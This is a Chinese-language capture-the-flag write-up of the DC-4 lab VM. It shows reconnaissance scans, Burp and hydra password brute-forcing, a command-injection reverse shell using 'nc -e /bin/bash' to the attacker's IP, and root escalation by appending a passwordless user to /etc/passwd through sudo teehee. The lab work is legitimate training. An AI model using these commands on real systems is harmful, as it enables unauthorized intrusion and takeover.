1.靶机部署
kali安装:https://blog.youkuaiyun.com/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载: https://www.five86.com/downloads/DC-4.zip
解压后得到一个.ova的文件:
使用VMware打开该文件:
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
导入成功,打开虚拟机,到此虚拟机部署完成!
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。
2.渗透过程
2.1 信息收集
2.1.1 探测主机
探测主机的工具有很多,常见的有arp-scan、nmap还有netdiscover
arp-scan -l
2.1.2 进行更详细的扫描:
nmap -sV -p- 192.168.11.138
2.1.3 web指纹识别:
whatweb -v 192.168.11.138
2.1.4 网站目录扫描:
dirb http://192.168.11.138 /usr/share/dirb/wordlists/big.txt
2.1.5 信息总结:
IP:192.168.11.138
开放的端口:
22:ssh服务
80:http服务
OS:Linux 3.2 - 4.9(debian)
nginx:1.15.10
其他网站目录
3.渗透测试
3.1 爆破
网站是一个登录页面,对页面进行爆破试试,使用BurpSuite进行抓包,爆破:
将抓到的数据发送到测试器:
得到账号密码:admin happy
3.2 登录网站
登录网站之后,找到一个执行命令的地方
3.3 反弹shell
打开网页源代码,可以看见我们选择的值,那么我们如果对值进行修改修改为其他命令,发现也可以执行,那我们是否也可以使用这个漏洞进行反弹shell
修改页面参数
nc -e /bin/bash 192.168.11.128 4444
成功拿到反弹shell
生成可交互式shell
python3 -c “import pty;pty.spawn(‘/bin/bash’)”;
3.4 搜集有用信息
在jim的用户文件夹里面找到类似密码本的东西
3.5 密码爆破
在端口扫描时,该主机开启了22端口,那我们可以尝试使用该密码本对jim进行爆破
hydra -l jim -P jim-passwd.txt ssh://192.168.11.138
得到用户的密码:
- 用户名:jim
- 密码:jibril04
3.6 登录jim用户
登录用户他提示我们有一封邮件!
查看邮箱:
发现用户Charles和密码:^xHhA&hvim0y
尝试切换用户:
3.7 提权
查找一番之后没有找到可用信息,查看自己的权限时发现自己可以以管理员身份使用teehee
那么我们就可以在/etc/psswd里面加个root用户
echo “xiaoqiu::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
切换到我们写入的用户,并进入root文件夹里面找到flag: